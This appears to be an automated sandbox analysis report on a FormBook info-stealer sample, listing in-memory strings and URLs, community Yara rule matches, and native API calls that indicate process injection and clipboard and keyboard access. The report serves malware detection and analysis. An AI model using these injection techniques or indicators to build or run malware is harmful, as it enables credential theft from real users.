            Source: netbtugc.exe, 00000006.00000003.2277485464.000000000855A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000002.3641939906.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640439126.0000000004E30000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003AA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.3640439126.00000000047E8000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003458000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.0000000022BA8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZl
            Source: netbtugc.exe, 00000006.00000002.3641939906.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640439126.0000000004E30000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003AA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C063 NtClose,1_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572B60 NtClose,LdrInitializeThunk,1_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035735C0 NtCreateMutant,LdrInitializeThunk,1_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03574340 NtSetContextThread,1_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03574650 NtSuspendThread,1_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572BF0 NtAllocateVirtualMemory,1_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572BE0 NtQueryValueKey,1_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572B80 NtQueryInformationFile,1_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572BA0 NtEnumerateValueKey,1_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572AD0 NtReadFile,1_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572AF0 NtWriteFile,1_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572AB0 NtWaitForSingleObject,1_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572F60 NtCreateProcessEx,1_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572F30 NtCreateSection,1_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572FE0 NtCreateFile,1_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572F90 NtProtectVirtualMemory,1_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572FB0 NtResumeThread,1_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572FA0 NtQuerySection,1_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572E30 NtWriteVirtualMemory,1_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572EE0 NtQueueApcThread,1_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572E80 NtReadVirtualMemory,1_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572EA0 NtAdjustPrivilegesToken,1_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572D10 NtMapViewOfSection,1_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572D00 NtSetInformationFile,1_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572D30 NtUnmapViewOfSection,1_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572DD0 NtDelayExecution,1_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572DB0 NtEnumerateKey,1_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572C60 NtCreateKey,1_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572C00 NtQueryInformationProcess,1_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572CC0 NtQueryVirtualMemory,1_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572CF0 NtOpenProcess,1_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572CA0 NtQueryInformationToken,1_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03573010 NtOpenDirectoryObject,1_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03573090 NtSetValueKey,1_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035739B0 NtGetContextThread,1_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03573D70 NtOpenThread,1_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03573D10 NtOpenProcessToken,1_2_03573D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B24340 NtSetContextThread,LdrInitializeThunk,6_2_03B24340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B24650 NtSuspendThread,LdrInitializeThunk,6_2_03B24650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03B22BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03B22BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03B22BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22B60 NtClose,LdrInitializeThunk,6_2_03B22B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22AF0 NtWriteFile,LdrInitializeThunk,6_2_03B22AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22AD0 NtReadFile,LdrInitializeThunk,6_2_03B22AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22FB0 NtResumeThread,LdrInitializeThunk,6_2_03B22FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22FE0 NtCreateFile,LdrInitializeThunk,6_2_03B22FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22F30 NtCreateSection,LdrInitializeThunk,6_2_03B22F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03B22E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03B22EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03B22DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22DD0 NtDelayExecution,LdrInitializeThunk,6_2_03B22DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03B22D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03B22D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03B22CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03B22C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22C60 NtCreateKey,LdrInitializeThunk,6_2_03B22C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B235C0 NtCreateMutant,LdrInitializeThunk,6_2_03B235C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B239B0 NtGetContextThread,LdrInitializeThunk,6_2_03B239B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22B80 NtQueryInformationFile,6_2_03B22B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22AB0 NtWaitForSingleObject,6_2_03B22AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22FA0 NtQuerySection,6_2_03B22FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22F90 NtProtectVirtualMemory,6_2_03B22F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22F60 NtCreateProcessEx,6_2_03B22F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22EA0 NtAdjustPrivilegesToken,6_2_03B22EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22E30 NtWriteVirtualMemory,6_2_03B22E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22DB0 NtEnumerateKey,6_2_03B22DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22D00 NtSetInformationFile,6_2_03B22D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22CF0 NtOpenProcess,6_2_03B22CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22CC0 NtQueryVirtualMemory,6_2_03B22CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B22C00 NtQueryInformationProcess,6_2_03B22C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B23090 NtSetValueKey,6_2_03B23090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B23010 NtOpenDirectoryObject,6_2_03B23010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B23D10 NtOpenProcessToken,6_2_03B23D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B23D70 NtOpenThread,6_2_03B23D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03308F50 NtDeleteFile,6_2_03308F50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03308E60 NtReadFile,6_2_03308E60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03308CF0 NtCreateFile,6_2_03308CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03309160 NtAllocateVirtualMemory,6_2_03309160
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03309000 NtClose,6_2_03309000
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044EB590_2_0044EB59
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_04199E800_2_04199E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181131_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040F9C31_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040F9BC1_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022091_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022101_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162FE1_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162BC1_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004163031_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FBE31_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DC631_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402DC01_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E6531_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FA3521_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036003E61_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E3F01_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E02741_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C02C01_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C81581_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DA1181_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035301001_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F81CC1_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036001AA1_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F41A21_2_035F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D20001_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035647501_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035407701_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353C7C01_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355C6E01_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035405351_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036005911_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F24461_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E44201_2_035E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EE4F61_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FAB401_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F6BD71_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA801_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035569621_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360A9A61_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A01_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354A8401_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035428401_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E8F01_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035268B81_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B4F401_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03560F301_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E2F301_2_035E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03582F281_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532FC81_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BEFA01_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540E591_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FEE261_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FEEDB1_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552E901_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FCE931_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DCD1F1_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354AD001_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353ADE01_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03558DBF1_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540C001_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530CF21_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0CB51_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352D34C1_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F132D1_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0358739A1_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355B2C01_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355D2F01_2_0355D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E12ED1_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035452A01_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360B16B1_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352F1721_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357516C1_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354B1B01_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EF0CC1_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035470C01_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F70E91_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF0E01_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF7B01_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035856301_2_03585630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F16CC1_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F75711_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DD5B01_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035314601_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF43F1_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFB761_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B5BF01_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357DBF91_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355FB801_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFA491_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F7A461_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B3A6C1_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EDAC61_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DDAAC1_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03585AA01_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E1AA31_2_035E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035499501_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355B9501_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D59101_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AD8001_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035438E01_2_035438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFF091_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03541F921_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFFB11_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03549EB01_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F1D5A1_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03543D401_2_03543D40
